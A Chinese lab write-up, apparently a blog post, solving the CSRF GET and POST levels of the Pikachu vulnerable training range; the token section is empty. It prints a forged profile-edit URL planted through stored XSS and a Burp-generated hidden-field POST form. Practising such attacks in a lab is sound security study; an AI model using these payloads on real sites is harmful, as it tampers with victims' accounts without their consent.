pikachu靶场通关-CSRF跨站请求伪造

CSRF

0x00 跨站请求伪造

Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个 攻击就完成了。所以CSRF攻击也成为"one click"攻击。很多人搞不清楚CSRF的概念,甚至有时候会将其和XSS混淆,更有甚者会将其和越权问题混为一谈,这都是对原理没搞清楚导致的。

攻击者: allen---->123456

被攻击者: kobe---->123456

0x01 CSRF(get) login

前期埋点

1、攻击者登录后获取修改信息的链接http://XXXXX/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=435434553&phonenum=136sad&add=4354343&email=345343&submit=submit

2、将链接通过存储型XSS存入网页中

image-20230211145725484

猎物上钩

1、受害者登录页面

2、浏览时发现攻击者埋的点,好奇心驱使他去点击

3、结果信息被修改

image-20230211150133535

0x02 CSRF(post) login

埋点

1、攻击者登录后通过存储型XSS埋点

<a href="http://XXXXX/csrf/pk_csrf.html">post</a>

pk_csrf.html内容:

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
 <form action="http://XXXXXX/pikachu/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
   <input type="hidden" name="sex" value="4354aa553" />
   <input type="hidden" name="phonenum" value="136sad" />
   <input type="hidden" name="add" value="435aaa3" />
   <input type="hidden" name="email" value="34aa43" />
   <input type="hidden" name="submit" value="suaait" />
   <input type="submit" value="Submit request" />
 </form>
</body>
</html>

上钩

1、受害者登录页面

2、浏览时发现攻击者埋的点,好奇心驱使他去点击

3、结果信息被修改

image-20230211150133535

0x03 CSRF Token login

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值